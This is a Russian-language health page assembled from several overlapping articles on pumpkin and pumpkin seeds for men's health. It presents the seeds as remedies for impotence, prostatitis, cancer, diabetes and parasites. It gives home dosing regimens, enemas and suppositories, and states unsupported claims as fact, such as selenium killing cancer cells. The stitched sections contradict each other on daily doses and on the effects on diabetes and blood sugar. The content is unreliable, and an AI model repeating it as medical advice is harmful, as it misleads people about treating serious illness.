0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Полезные и вредные свойства тыквы для мужчин

Польза и вред тыквенных семечек для мужчин

Дата обновления: 2019-12-28

Одной из самых вкусных и полезных культур является тыква. Родиной этого уникального растения считается Латинская Америка. Еще в 17 столетии американцы признали ее полезные свойства, и использовали для лечения различных заболеваний. Но, пользу приносит не только мякоть овоща, но и ее семечки. В условиях современного ритма жизни, качества питания, экологии нарушается функционирования многих систем и органов мужского организма. Для полноценной работы репродуктивной системы тыквенные семечки просто незаменимы. В чем же заключается их польза? И может ли продукт нанести вред?

Химический состав семечек тыквы

Ядра семян тыквы обладают поистине уникальным составом. Минеральный и витаминный состав обеспечивает организм всеми необходимыми веществами. Так, славятся семечки витаминными группами B, E, C, PP, K. Наибольшей концентрацией отличаются следующие из них: B1, B2, B6, B5, B9, B3. Присутствие практически всех витаминов группы B и делает продукт незаменимым, уникальным.

Тыквенные семечки для мужчин ценны минералами и микроэлементами. Для мужской силы, потенции большую роль играют такие вещества:

В 100 граммах семян тыквы содержится полторы суточной нормы магния, две дневные нормы марганца. Достаточно много цинка и железа в продукте. Так, 100 грамм семечек насчитывает 70% дневной нормы цинка, и 50% требуемого железа в день. Достаточно употреблять всего горсть очищенных семечек, чтобы поддерживать потенцию на должном уровне.

Злоупотреблять продуктом не стоит. Ведь больше не значит лучше. Продукт достаточно высококалорийный. На 100 грамм ядер приходится 560 ккал. При чрезмерном потреблении может развиться ожирение. Также, пищевая ценность насчитывает белки(30 грамм), жиры(50 грамм) и углеводы (11 грамм). Они отлично насыщают, придают сил и энергии. В составе есть пищевые волокна. Очень много насыщенных жирных кислот находится в семенах тыквы. Наибольшей концентрацией обладают стеариновая, пальмитиновая, арахиновая, бегеновая кислоты. Среди ненасыщенных жирных кислот стоит отметить линолевую, олеиновую, Омега-3, Омега-6. Группа незаменимых аминокислот представлен аргинином, лизином, треонином, лейцином, тирозином, изолейцином.

Польза семечек тыквы для мужского здоровья

Семена тыквы являются незаменимым продуктом для мужского здоровья. В первую очередь, семечки оказывают общеукрепляющее воздействие на организм. Высокий уровень витаминов антиоксидантов укрепляет общий иммунитет, защищают клетки организма от пагубного влияния свободных радикалов. Специалисты рекомендуют регулярно употреблять семена тыквы для профилактики раковых заболеваний.

Очень полезны для мужчин витамины группы B. Так, B2 необходим для восстановления работы печени, слизистой оболочки желудка. Витамин B1 снижает негативное воздействие алкоголя и табакокурения на весь организм. При достаточном его уровне улучшает работа мозга, укрепляется сердечная мышца. Данная витаминная группа очень важна для молодых людей, занимающихся спортом. Благодаря ей очень быстро восстанавливает структура и энергия мышц, происходит их активный рост. Витамин В4 обладает такими полезными свойствами:

  • Улучшает передачу нервных импульсов;
  • Оказывает детокс-эффект для печени;
  • Препятствует развитию желчнокаменной болезни;
  • Устраняет холестериновые бляшки;
  • Оказывает профилактику атеросклероза;
  • Улучшает выработку инсулина;
  • Нормализует функции предстательной железы.

Благодаря большому количеству витамина B5, тыквенные семечки налаживают функции надпочечников. При нормальной их работе в организме мужчины устраняются любые воспалительные процессы, в том числе и воспаления органов мочеполовой системы. Также, поддерживается работа нервной системы. Молодые люди становятся менее подвержены стрессовым ситуациям, конфликтам, плохому настроению. Известно, что переутомление, стресс и бессонница приводят к снижению потенции, и полному половому бессилию.

Очень полезен селен. Этот химический элемент содержится не в любом продукте питания. К тому же, его уровень не высок. Тыквенные же семена насыщены этим важным компонентом. Итак, селен убивает раковые клетки, препятствует их повторному появлению, восстанавливает здоровые клетки организма после ракового воздействия. Также, селен повышает защитные функции организма, выводит токсины и тяжелые металлы. Специалистами установлено, что селен оказывает профилактику мужского бесплодия, укрепляя местный иммунитет репродуктивной системы.

Тыквенные семечки для потенции

Тыквенные семечки для мужчин полезны тем, что нормализуют работу органов малого таза. Благодаря уникальному составу, продукт повышает уровень либидо, половую выносливость, нормализует гормональный фон. В частности, цинк, селен и витамин E принимают активное участие в выработке мужского полового гормона тестостерона. При нормальном его уровне проблем с потенцией, эрекцией не наблюдается.

Помимо этого, цинк улучшает морфологические показатели, качество спермы. Так, увеличивается количество подвижных, активных сперматозоидов. Это повышает шансы на успешное зачатие здорового ребенка. Ядра тыквенных семян советуют употреблять для профилактики мужского бесплодия. Врачи настоятельно рекомендуют употреблять продукт в пищу мужчинам, старше 40 лет. Это окажет профилактическое воздействие простатита. Для мужской потенции большую роль играет фолиевая кислота (витамин B9). Компонент улучшает показатели крови, усиливает синтез лейкоцитов.

Повысить потенцию, половое влечение можно за счет восстановления функций эндокринной, мочеполовой, сердечно-сосудистой системы. Для стойкой регулярной эрекции важно состояние сосудов. Калий и магний, входящие в состав продукта, снижают уровень холестерина в крови, укрепляют стенки сосудов, повышают их проходимость. При стимуляции возбуждения наблюдается усиленный приток крови к пещеристым телам полового члена. В случае закупорки сосудов (при атеросклерозе) стойкая эрекция невозможна. Семечки снижают артериальное давление, защищают мужчин от инсульта, инфаркта и сахарного диабета.

Как употреблять ядра семян тыквы?

В каком виде лучше употреблять продукт? Продукт в любом виде является натуральным лекарством импотенции, простатита, заболеваний сердечно-сосудистой и эндокринной системы. Ежедневное употребление минимального количества семечек улучшит сексуальную жизнь, защитит предстательную железу от аденомы, простатита, рака простаты. Всего 20-30 граммов в день обеспечат мощный профилактический эффект.

Конечно, лучше употреблять свежие семена. При их изъятии из тыквы, семена высушиваются на солнце, при комнатной температуре. Такие ядра будут обладать всем спектром полезных веществ. Если же продукт предварительно поджарить, подвергнуть их термической обработке, концентрация полезных веществ снизится. А вот калорийность тыквенных семечек наоборот повысится. Не менее полезной для потенции является и тыквенная каша. Таким образом, данная овощная культура является полностью безотходной.

Сегодня существует большое количество продуктов питания, содержащих семена тыквы. Это может быть хлеб, сдобная выпечка, десерты, салаты. Такие блюда тоже стоит включить в ежедневный рацион питания. Из-за своих нейтральных вкусовых качеств, семена отлично подходят для сочетания с кашами, крупами, сухофрутками, овощами.

Семечки с медом

Это средство используют для повышения потенции, лечения воспаления предстательной железы. Для приготовления такого лекарства требуется смешать 2 стакана очищенных, измельченных семян тыквы с 1 стаканом натурального меда. Масса тщательно смешивается, и из нее формируются небольшие сладкие шарики. В среднем, должно получиться 15-20 шариков. Шарики нужно хранить в холодильнике. Перед употреблением лучше на полчаса достать из холодильника для нагрева при комнатной температуре. Принимают такие шарики по 1 штуке в день за 20 минут до приема пищи. Курс терапии длится до тех пор, пока препарат не закончится. Этот метод считается самым эффективным при лечении эректильной дисфункции.

Семена против воспаления органов мочеполовой системы

Чтобы устранить воспалительный процесс, повысить потенцию можно воспользоваться следующим рецептом:

  • Цветки ромашки — 10 грамм;
  • Семена тыквы — 20 грамм;
  • Семена льна — 20 грамм;
  • Цветки бузины — 10 грамм;
  • Листья ежевики — 10 грамм;
  • Трава зверобоя — 20 грамм;
  • Вода — 500 грамм.

Все растительные компоненты смешиваются, измельчаются. Около 30 граммов полученной смеси заливаются горячей водой, и настаиваются в течение полутора часов. Далее, средство процеживается, и принимается за 4 приема на протяжении всего дня. Курс терапии длится 2 недели. При необходимости, лечение можно повторить после 2 недельного перерыва.

Вред тыквенных семян

Как и любой другой продукт, семена данного растения могут нанести вред при неправильном их употреблении. Крайне важно кушать ограниченное количество продукта. Так, средней безопасной дозой будет 20 грамм продукта в день. Более 50 грамм в день могут навредить фигуре, привести к жировым отложениям, ожирению. Жареные, соленные семечки провоцируют отложения вредных веществ и минералов солей. Из-за этого теряется эластичность мышц, подвижность суставов.

Многие мужчины предпочитают употреблять тыквенные семена, в качестве закуски к пиву. Такой вариант употребления продукта не просто не окажет положительного результата, но и еще более усугубит положение. Щелканье ядер нарушает целостность эмали. Поэтому, очищать семена от кожуры нужно только руками. Ограничить потребление продукта рекомендуют при наличии таких заболеваний:

  • Дисбактериоз кишечника;
  • Язвенная болезнь желудка;
  • Острый гастрит;
  • Панкреатит;
  • Расстройства системы пищеварения.

Некоторые люди страдают от индивидуальной непереносимости ядер. В этом случае семена тыквы категорически запрещены к употреблению. При отсутствии противопоказаний, умеренное количество семечек окажет только пользу мужскому здоровью.

Полезные и вредные свойства тыквы для мужчин

Польза тыквы для мужчины доказана уже давно. Тыква и тыквенные семечки являются ценнейшим продуктом — они содержат полезные и питательные вещества и помогают справиться со многими болезнями.

Полезные и вредные свойства тыквы для мужчин

Состав

Уникальная и неоценимая польза тыквенных семечек обусловлена высоким содержанием питательных веществ:

  • витамины группы В;
  • аминокислоты;
  • жирные кислоты;
  • витамин А, К, С, Е, Д;
  • фосфор, магний, калий;
  • противоглистное вещество;
  • антидепрессанты.

Такой богатейший состав помогает быстро восстановить силы организма, насытить его полезными компонентами и энергией.

Полезные свойства для мужчин

При правильном употреблении польза тыквы выражается в следующем:

  • препятствует развитию неврологических отклонений и заболеваний сердечно-сосудистой системы;
  • укрепляет иммунитет;
  • придает сил, тонизирует и улучшает самочувствие;
  • способствует регенерации поражений кожи любого типа — ожоги, раны, трещины, травмы;
  • цинк и фосфор, входящие в состав семян, способствуют укреплению костной ткани и суставов;
  • масло на основе семечек применяется в борьбе с артритом и для профилактики остеохондроза и остеопороза;
  • устраняет кожную сыпь на теле;
  • препятствует развитию диабета и дальнейшему усугублению болезни;
  • выводит из организма шлаки, токсины и вредные вещества, скопившиеся в почках и печени;
  • устраняет любые проблемы с почками;
  • помогает в лечении простатита;
  • утоляет болевой синдром при мочеиспускании и предупреждает развитие заболеваний половой системы;
  • клетчатка благотворно влияет на работу желудка, кишечника и нормализует стул;
  • выводит из организма свободные радикалы;
  • кальций, который содержится в большом количестве в семенах, способствует нормализации всех внутриклеточных процессов, ускоряет свертываемость крови и стимулирует быстрое сокращение мышечной ткани;
  • способствует выработке серотонина — гормона счастья;
  • уникальная польза семян отмечается в лечении проблем с потенцией и помогает при зачатии ребенка;
  • предупреждает облысение.

Мякоть тыквы является не менее полезной — блюда на ее основе помогают предупредить сердечно-сосудистые заболевания, способствуют нормализации АД и сердечного ритма, устраняют спазмы и предупреждают развитие тромбоза.

Стоит учитывать, что тыквенные семечки будут проявлять лечебные свойства на полную, если мужчина будет вести здоровый образ жизни и следить за своим здоровьем.

Противопоказания и вредные свойства

Чрезмерное употребление тыквы может навредить организму

Во всем нужно знать меру, и в употреблении тыквенных семян тоже, иначе они могут нанести вред всему организму.

  1. В случае переедания возможно расстройство пищеварительного тракта. Для тучных людей это грозит прибавкой в весе. Суточная доза для здоровья составляет 100 г.
  2. Некоторые любят кушать семена жаренными, но не стоит забывать о том, что такой продукт практически не содержит никаких полезных веществ.

Противопоказаны людям с повышенным уровнем кислотности, а также при наличии камней и песка в почках. Большой вред могут нанести тому, у кого есть проблемы с кишечником. Они затрудняют процесс прохождения пищи по толстой кишке.

Следует учесть все вредные свойства и противопоказания, а еще лучше проконсультироваться со специалистом.

Правила приема

Кушать можно в любое время. Некоторые предпочитают употреблять шрот из семян и кожуры (в таком виде польза удваивается, т. к. кожица также содержит много полезных веществ).

Очень вкусной и полезной является выпечка с добавлением тыквенных семян — хлеб, сдоба и т. д.

Также можно добавлять измельченные семена в гарнир или каши. Для улучшения вкуса их смешивают с мёдом.

Рецепты

Список полезных рецептов для мужского организма.

Простатит и аденома

Необходимо взять измельченные семена — 100 г и мед — 50 г. Перемешать оба компонента и скатать их в одинаковые шарики.

Их помещают в холодильную камеру для хранения. Каждое утро натощак необходимо принимать по 1 шт. Курс терапии составляет 1 месяц, затем нужно сделать перерыв на 7 дней.

Полезно кушать мед с тыквенными семечками и измельченными орехами (лесными, грецкими). Также к этой смеси можно добавить кунжут.

Глистные инвазии

Выведение паразитов из организма проводится в два этапа:

  1. Сначала необходимо вывести взрослых особей. Для этого: смешивают 300 г молотых семян со 100 г меда. Полученную массу необходимо съесть утром натощак, разделить лекарство можно на несколько приемов, но принимать нужно только перед едой. Спустя 5 часов следует принять слабительное.
  2. Второй этап заключается в полной чистке организма. Для этого необходимо каждый день утром и вечером на голодный желудок принимать шрот из тыквенных семечек — по 1 ч. л. на протяжении месяца.

Тыквенный порошок провоцирует гибель паразитов, которые могут выделять большую дозу токсинов. Поэтому второй этап лечения желательно начинать с малых доз лекарства — начиная с щепотки и заканчивая 1. ч. л. лечебного средства.

Диабет

Отвар из семян тыквы облегчит состояние при диабете

Отвар на основе тыквенных семян не лечит сахарный диабет, но помогает нормализовать ситуацию и устранить неприятные симптомы.

2 ст. л. очищенных и измельченных семян заливают 400 мл кипятка. Через пару часов после настаивания отвар профильтровывают и принимают в течение дня, разделив на два приема.

Такое средство помогает уберечь почки от нагрузки, которую получает диабетик во время болезни.

Кроме этой патологии у мужчин, страдающих диабетом, нарушается жировой обмен, в результате чего повышается риск инсультов и инфарктов.

Предупредить такие последствия поможет один простой рецепт:

  • необходимо взять измельченные тыквенные семечки, листочки малины, душицы, брусники, баданы и черники — по 10 г каждого компонента;
  • перетереть все на порошковую массу;
  • 1 ст. л. смеси залить 300 мл чистой воды комнатной температуры;
  • настоять полчаса, профильтровать, выпить за день, разделив на 3 приема.

Иммунитет

Сырые тыквенные семечки благотворно влияют на иммунную систему — укрепляют организм и устойчивость к различным болезням. Для повышения иммунитета нужно съедать каждый день по 40 шт. очищенных семян либо 20 г шрота.

Употреблять такой продукт можно с разными блюдами или добавить к нему мед.

Потенция

Для повышения потенции измельченные семечки (500 г) можно употреблять в сочетании с медом (200 г). Также можно съедать сырые, просушенные семена — по 50 шт. в день.

Еще один способ повышения потенции — измельчить семена на кофемолке и принимать шрот по 1 ч. л. в день на протяжении месяца. Частота приема — 3 раза в день.

Сок из мякоти тыквы также содержит большое количество полезных веществ. Полезные свойства:

  • предупреждает рост раковых клеток и преждевременное старение кожи;
  • очищает печень при гепатите;
  • нормализует уровень холестерина в крови;
  • помогает бороться с эмоциональным напряжением и благотворно влияет на нервную систему;
  • устраняет неприятные проблемы с потенцией, снимает воспаление простаты.

Масло

Тыквенное масло очень полезно

Масло тыквы — экологически чистый продукт, который продается в продуктовых магазинах. Это очень полезная добавка к разным блюдам и десертам.

Масло помогает устранить множество проблем со здоровьем:

  1. Расстройства пищеварительной системы. Продукт обладает легким слабительным действием, очищает печень, способствует выведению желчи и заживляет раны, которые образуются на слизистой желудка и кишечника.
  2. Натуральное сырье помогает в лечении заболеваний легочной системы — бронхита, пневмонии и туберкулеза. При регулярном употреблении устраняются воспалительные процессы.
  3. Слабость и усталость. Повышает устойчивость к вирусной и бактериальной инфекциям.
  4. Это отличный аналог препаратов для профилактики и лечения глазных заболеваний: катаракты и слезоточивости глаз.
  5. Повышает эластичность сосудов и укрепляет сосудистые стенки, тем самым препятствует развитию сердечных и сосудистых заболеваний.
  6. Является отличным антисептиком, который помогает устранить угревую сыпь, герпес и любые заболевания дермы.
  7. Хорошее мочегонное средство, которое можно применять для очистки почек.

В каких случаях запрещено

Несмотря на вышеописанные полезные свойства, употреблять тыквенное масло разрешается не всем. Есть у этого продукта некоторые противопоказания:

  • соблюдение нормы является обязательным, т. к. передозировка может привести к серьезным осложнениям;
  • нельзя употреблять такой продукт диабетикам;
  • аллергия и индивидуальная непереносимость продукта.

При отсутствии каких-либо патологий и болезней здоровым людям можно регулярно добавлять такой продукт в разные блюда — каши, салаты, гарниры и т. д.

Правила применения

Если вы решили использовать масло для лечения, стоит строго соблюдать норму применения:

  1. При кожных заболеваниях — 5 мл и не чаще 3-х раз в день. Кроме внутреннего приема лечебным маслом следует смазывать пораженные участки на коже.
  2. При атеросклерозе масло пьют по 5 мл трижды в день. За весь курс лечения нужно выпить 600 мл лечебного средства, затем сделать перерыв. Общий курс лечения составляет 12 месяцев с двумя перерывами.
  3. При запоре рекомендуется следующая схема — по 10 мл 4 раза в сутки.
  4. Для нормализации работы пищеварительной системы — по 10 мл 4 раза в день. Длительность терапии зависит от тяжести болезни.
  5. При цистите, катаракте и воспалении легких — принимать по 10 капель 3 раза в день.

Полезные рекомендации

Необходимо следовать простым правилам употребления:

  • чем лучше измельчен продукт, тем лучше он усваивается;
  • употреблять следует исключительно сырые семечки, т.к. поджаренное сырье теряет все полезные компоненты;
  • категорически запрещено совмещать такой продукт с алкоголем;
  • оптимальная норма в день — 40 шт. (100 г);
  • съедать семечки натощак рекомендуется только в лечебных целях.

Сок из тыквы лучше сделать самостоятельно — он будет отличным вариантом для повышения иммунитета зимой.

Тыква: польза и вред для организма

История тыквы

Польза тыквы

Тыква – кладезь витаминов, и немалая их часть находится не только в мякоти, но и в семечках, цветах. В тыкве в 4-5 раз больше каротинов, чем в моркови. Каротины в организме превращаются в витамин A, который особенно полезен для зрения, а также является мощным антиоксидантом. В тыкве есть витамины C, E, K и практически все витамины группы B.

В семенах содержится множество микроэлементов, а по содержанию цинка тыквенные семечки входят в тройку лидеров.

Из-за низкой калорийности тыква считается идеальным диетическим продуктом, ведь в ней нет крахмала, холестерина и трансжиров, мало сахара, зато много полезной для пищеварения клетчатки. Калорийность 100 г мякоти всего 22 ккал.

Вред тыквы

Даже полезный продукт может нанести вред, поэтому стоит учитывать возможные противопоказания. Кому следует с осторожностью отнестись к введению в рацион тыквы, рассказал Александр Войнов, консультант по диетологии и оздоровлению в сети фитнес – клубов WeGym: «Употребление сырой тыквы противопоказано людям с воспалительными заболеваниями желудочно – кишечного тракта, а так же тем, кто имеет камни в желчном пузыре и почках, поскольку тыква обладает желчегонным действием и может спровоцировать движение камней. Сырой овощ сложнее переварить, поэтому лучше не давать необработанную тыкву маленьким детям и пожилым людям. Диабетикам также не стоит увлекаться тыквой, поскольку это может вызвать повышение уровня сахара в крови.

Иногда частое потребление этого овоща может вызвать вздутие живота и послабление стула, тогда нужно снизить объем порции и частоту употребления. Неумеренное питание тыквой может привести к ложной каротиновой желтухе, содержащийся в овоще каротин вызывает пожелтение кожи. Изредка встречается индивидуальная непереносимость и аллергия, в этом случае от продукта лучше отказаться. Стоит ограничить употребление тыквенных семечек тем, кто на диете – следует помнить об их высокой калорийности: 100 г содержат 559 ккал».

Применение тыквы в медицине

Тыква часто используется в диетологии – существуют полностью тыквенные диеты. Этот низкокалорийный овощ снижает аппетит за счёт большого количества клетчатки и пищевых волокон, и нормализует обмен веществ. Однако следует с осторожностью худеть с помощью тыквы, объясняет эксперт Александр Войнов: «Ожирение – это серьезное заболевание. Самолечение часто приводит к плохим результатам. Обращайтесь к специалистам для выяснения всех нюансов и выбора метода похудения. Тыква благодаря её полезным свойствам, часто встречается в различных диетах, но лишь как часть возможного комплексного рациона, который обеспечит похудение, не лишая организм всех необходимых ему элементов. Тыкву рекомендуется употреблять в первой половине дня и желательно в сыром виде».

Тыква положительно сказывается на состоянии половой системы мужчин. В мякоти овоща высокая концентрация витамина Е – токоферола, который с греческого переводится как «приносящий потомство». Семена содержат много цинка: 30 г восполняют до 70% суточной потребности. Также тыквенные семечки – рекордсмены среди продуктов по содержанию L-аргинина. Вкупе они оказывает заметное влияние на весь организм: участвует в синтезе тестостерона, нормализуют функцию предстательной железы, улучшают состояние сердечно – сосудистой системы, влияют на эректильную функцию.

В тонкой пленке – оболочке тыквенного семени содержится аминокислота кукурбитин, которая обладает антигельминтными свойствами, что использовалось еще в народной медицине. Благодаря редким побочным эффектам, отвар неочищенных семян давали детям и беременным.

Доказано влияние тыквенных семечек даже на раковые заболевания: высокая концентрация цинка способствует предотвращению развития рака пищевода. Цинк пагубно влияет на раковые клетки, при этом не повреждая клетки организма, установили американские ученые. Ученые объясняют это связью цинка и кальция. Цинк «откликается» на сигналы кальция, «посылаемые» из раковых клеток. Мякоть тыквы также может вносить свой вклад в борьбу с раком. Содержащийся в ней провитамин А способствует предотвращению развития рака лёгких. Ученые экспериментально установили, что действие никотинпроизводного канцерогена, содержащегося в сигаретах, нейтрализуется благодаря небольшим дозам провитамина А.

Маски из кашицы семян, а также компрессы из сока мякоти используются в косметологии для увлажнения и осветления кожи, уменьшения воспалений. Масляный экстракт ускоряет заживление повреждений эпидермиса.

Тыква обладает послабляющим, противовоспалительным и желчегонным действием, поэтому небольшое количество полезно для людей с застойными явлениями и запорами.

Высокое содержание калия в мякоти снижает риск сердечно – сосудистых заболеваний и укрепляет стенки сосудов, что крайне полезно для лиц, страдающих атеросклерозом и повышенным давлением.

Чем полезна тыква для мужчин и как её правильно употреблять с максимальным лечебным эффектом

Тыкву ценят за противовоспалительное действие, благотворное влияние на зрение. Но древние греки, активно развивавшие медицину, знали и про другое важное свойство этого овоща. Неспроста они считали тыквину символом мужской силы — один стакан сока в день позволял греческим мужчинам в тот день не терять сноровки в делах любовных. Чтобы понять, чем полезна тыква для мужчин, мы подробно изучили ее состав и узнали, как лучше ее есть.

Ботаническое описание и происхождение

Тыква обыкновенная (лат. Cucurbita pepo) относится к травянистым растениям из семейства Тыквенные. Это однолетнее растение со стержневой или ветвистой корневой системой. Его плод так и называется — тыквина. Представляет из себя мясистый крупный шар или овал, покрытый крепкой коркой и со множеством семян внутри. Созревают тыквины обычно в конце лета-начале осени.

Тыква активно выращивается по всему миру, первые три места по ее производству занимают Китай, Индия и Россия.

Состав тыквы

Овощ содержит бета-каротин и витамины B1, B2, C, E и никотиновую кислоту. Также тыква богата следующими необходимыми для нашего организма минералами: калий, кальций, натрий, магний, цинк, фтор.

Это интересно. Особенно много в тыкве содержится калия — до 204 мг на 100 г продукта.

По пищевой ценности тыква относится к диетическим продуктам. В 100 г продукта в среднем содержится 1 г белков, 0,1 г жиров и 4,2 г углеводов. Энергетическая ценность составляет 25 ккал, что позволяет отнести ее к низкокалорийным овощам.

Польза, вред и противопоказания

Благодаря своему витаминно-минеральному составу, тыква обладает следующими полезными свойствами:

  • улучшает пищеварение и выводит из организма лишнюю воду;
  • нейтрализует повышенную кислотность желудочного сока;
  • высокое содержание калия благоприятно влияет на сердечно-сосудистую систему, защищает от образования холестериновых бляшек;
  • благодаря высокой концентрации каротина тыква укрепляет иммунитет и улучшает зрение;
  • регулярное употребление тыквы снижает уровень сахара в крови.

Употребление тыквин может быть вредно только в том случае, если их едят в необработанном виде.

Употребление тыквы противопоказано людям с:

  • больными почками, так как тыква содержит в себе 90% воды;
  • сахарным диабетом — овощ понижает уровень сахара в крови;
  • пониженной кислотностью желудка — тыква по своему pH составу щелочной продукт.

Лечебные свойства тыквы для мужского здоровья

Теперь рассмотрим подробнее пользу для организма мужчин. Основной секрет кроется в содержании цинка. Этот элемент нормализует работу предстательной железы и участвует в образовании сперматозоидов. Цинк содержится как в мякоти, так и в семени.

Еще два важных элемента для мужского здоровья — железо и калий. Благодаря их влиянию на кровеносную систему, а особенно благодаря защите от бляшек, кровь без препятствий приливает к нужным местам.

Но самое необычное влияние тыквы на мужской организм обнаружили ученые из научно-исследовательского центра по запаху и вкусу в Чикаго. Оказывается, запах овоща возбуждает мужчин, выступая мощным афродизиаком! Он увеличивает приток крови к половому органу на 40%. Возможно, мужчины на подсознательном уровне чувствуют, как тыквины необходимы для их потенции.

Применение тыквы в лечебных целях

В первую очередь мужчинам стоит обратить внимание на семена тыквы — в них повышенное содержание цинка. Если уже имеются проблемы с мочеиспусканием, то лучше употреблять проросшие семечки — они оказывают противовоспалительное действие. Есть семена можно в сыром виде, в виде каши, а также применять семечковое масло.

Это важно. Мужчинам после 50 лет рекомендуется есть семя тыквы каждый день для профилактики аденомы простаты.

Мякоть тыквин можно употреблять в любом виде (кроме сырого). К интересным свойствам тыквы относится и то, что она способна сохранять свой витаминный состав даже после термической обработки. Из овоща можно готовить супы, каши, овощные рагу, вкусные оладьи и пироги. Или пить свежевыжатый сок, хотя далеко немногие любят его вкус. Главное — употреблять по 150 г тыквы хотя бы три дня в неделю.

И не забывайте про возбуждающий запах тыквы, поэтому рекомендуется есть ее непосредственно перед близким общением с вашей возлюбленной.

Если уже есть простатит, врачи назначают тыквенные клизмы и свечи. Употребляя тыкву таким своеобразным способом, вы усвоите больше важных элементов.

Чтобы приготовить клизму, нужно:

  1. Помыть и почистить тыквину.
  2. Вырезать из нее небольшой ломтик.
  3. Отварить ломтик до размягчения.
  4. Остудить и процедить полученный отвар.
  5. Ставить клизму перед сном в течение недели.

После этого можно перейти на свечи. Свечи из тыквенного масла продаются в аптеке, но можно их сделать самим. Для этого измельчите тыквенные семена и полученный порошок смешайте с маслом какао в соотношении 1:1. Такие свечи также помогают при геморрое. Вводите суппозитории в течение недели и сделайте перерыв. Если проблема осталась — через две недели повторите курс лечения.

Как правильно выбрать тыкву

При выборе качественной и полезной тыквины соблюдайте следующие правила:

  • не стоит брать слишком большие плоды, у них более волокнистая мякоть;
  • как и у других бахчевых культур, плодоножка должна быть высохшей;
  • у спелой хорошей тыквины твердая кожура без внешних повреждений и следов гниения;
  • рекомендуется брать оранжевые тыквины — они более сладкие;
  • при постукивании по поверхности слышен глухой звук;
  • полосы на кожуре должны быть прямыми.

Как вы могли заметить, правила похожи на те, что используются при выборе арбуза и дыни. Поэтому у опытных любителей бахчевых культур не должно возникнуть проблем с покупкой спелой и качественной тыквины.

Заключение

В современном мире непросто оставаться настоящим мужчиной. Быстрый темп жизни, постоянные стрессы и неблагоприятная экологическая ситуация в больших городах оказывают пагубное влияния на сложный мужской организм. Хорошо, что есть помощь от самой матушки-природы в виде большой полезной тыквины. Даже один ее вид, напоминающий летнее солнце, способен принести ярких красок в серые будни.

Будучи природным афродизиаком и имея в своем составе столь необходимые цинк и витамины, тыква стоит на страже мужского здоровья. А обилие кулинарных рецептов с этим ценным овощем способно угодить вкусу почти любого гурмана.

Тыква: польза и вред для организма

Т ыква — это настоящий дар природы, который человек издавна употребляет в пищу! Мякоть этого ароматного, ярко-оранжевого плода невероятно вкусна, питательна, полезна. А уж сколько блюд можно приготовить из спелой тыквы, так не счесть! Растение неприхотливо, потому растёт на территориях почти всех регионов России, куда весной и летом заглядывает тепло. Но и там, где садоводство и огородничество не распространено из-за климатических особенностей местности, найти тыкву можно в овощной лавке, супермаркете или продуктовом магазине. Стоит тыква совсем недорого. А значит, наслаждаться этим продуктом растительного происхождения можно вдоволь.

Польза тыквы для организма человека

Задумывались ли вы, в чём кроется секрет популярности тыквы? Ведь этот плод, напитанный лучами солнца и соками самой природы, употребляют в пищу в странах с разными культурами, обычаями, традициями. Манера употребления этого плода может быть разной, рецепты приготовления также разнятся, но ценят этот продукт представители разных мировых кухонь. И это неспроста! Дело бесспорно во вкусе и, конечно, неоценима польза этого продукта. Рассмотрим, в чём заключается польза тыквы для человеческого организма.

Описание и характеристики

Тыква — однолетнее растение, относящееся к бахчевой культуре. Плоды тыквы достигают до 10 килограмм веса в период зрелости. Форма плода может быть овальной или округлой, неправильной (грушевидной). Цвет кожуры ярко-оранжевый, ненасыщенный зеленый. Мякоть имеет медово-желтый или насыщенный оранжевый цвет. У плода специфический сладковато-пряный аромат. Вкус спелой мякоти сильно зависит от сорта. Чаще это сладковатый или насыщенный сладкий вкус, перемежающийся с травянистой сочной свежестью, характерной для бахчевых культур. Съедобная часть тыквы — это не только мякоть. В кулинарии широко применяются и тыквенные семечки. Их употребляют в пищу или добавляют в качестве приправ. Из тыквенных семян делают косметическое масло.

Энергетическая ценность и состав

На 100 грамм продукта:

  • 26 Ккал;
  • 1 г — белки;
  • 0,1 г — жиры;
  • до 4,4 г — углеводы;
  • воды — 92 %.

Примечательно то, что в этом продукте нет крахмала, вредных жиров. Основную часть массы составляет полезная мякоть, насыщенная пищевыми волокнами и соками. Сахаров в этом растительном плоде — 2,8 г. До 0,4 г содержится клетчатки.

Какие есть витамины в тыкве

Особую ценность тыква представляет за счёт богатого содержания витаминов и прочих полезных веществ.

В одном спелом плоде есть:

  • бета-каротин — до 62 %;
  • витамин А — до 42 %;
  • альфа-каротин — до 85 %;
  • витамины группы В (почти все) 201 до 5–10 %;
  • витамин Е, С, К — до 3–5 %.

В этом ароматном вкусном плоде содержится:

  • магний — 148 %;
  • кальций — 2,2 %;
  • марганец — 5,3 %;
  • железо — 8 %;
  • цинк — 2,8 %;
  • фосфор — 6,2 %;
  • калий — 7,1 %.

Это лишь малая, но самая яркая часть химического состава тыквы. Однако в мякоти этого плода есть и другие вещества, которые благотворно влияют на здоровье человека.

Польза тыквы для организма простыми словами

Конечно, химикам и медикам легко определить полезность тыквы для организма только при взгляде на состав этого плода. Ну а мы попробуем разобрать, в чём суть пользы тыквы для организма человека, глядя не только на то, какие витамины в тыкве есть, но и учитывая общие особенности этого продукта.

Итак, доказана следующая польза тыквы для человеческого здоровья:

  • очищение организма от токсинов и шлаков;
  • нормализация водно-солевого баланса;
  • стабилизация метаболизма;
  • снижение артериального давления;
  • повышение гемоглобина;
  • улучшение структуры тканей, повышение эластичности;
  • повышение иммунитета;
  • антипаразитарное свойство (тыквенные семечки);
  • улучшение пищеварения;
  • выравнивание гликемического профиля при сахарном диабете;
  • укрепление сердечной мышцы и стенок сосудов.

Стоит отдельно отметить, что употребление мякоти тыквы в пищу не повышает риски лишнего набора килограммов. Это плод, подаренный солнцем, вполне подходит для полезного диетического питания. Сытная и вкусная мякоть насыщает, но не способствует отложению жировой ткани в организме. Тыква выводит, а не задерживает лишнюю жидкость.

Если рассматривать пользу этого продукта с точки зрения медицины, то хочется отметить, что тыкву рекомендуется добавлять в рацион при рисках или установленном факте наличия таких заболеваний:

  • сахарный диабет;
  • гипертония;
  • мочекаменная болезнь;
  • некоторые заболевания ЖКТ (с разрешения лечащего врача);
  • атеросклероз;
  • простудные заболевания;
  • временное ослабление иммунитета;
  • период менопаузы у женщин.

Неоценимую пользу приносит тыква мужчинам и женщинам в репродуктивном возрасте. Считается, что свежий сок тыквы благотворно влияет на мужскую потенцию. Витаминная насыщенность этого плода хороша для создания здорового фона в организме женщины перед зачатием и во время вынашивания младенца. Насыщенность этого продукта железом указывает на то, что мякоть полезна для кроветворения, а также помогает поддерживать здоровый баланс веществ в женском организме в менструальный период у женщин.

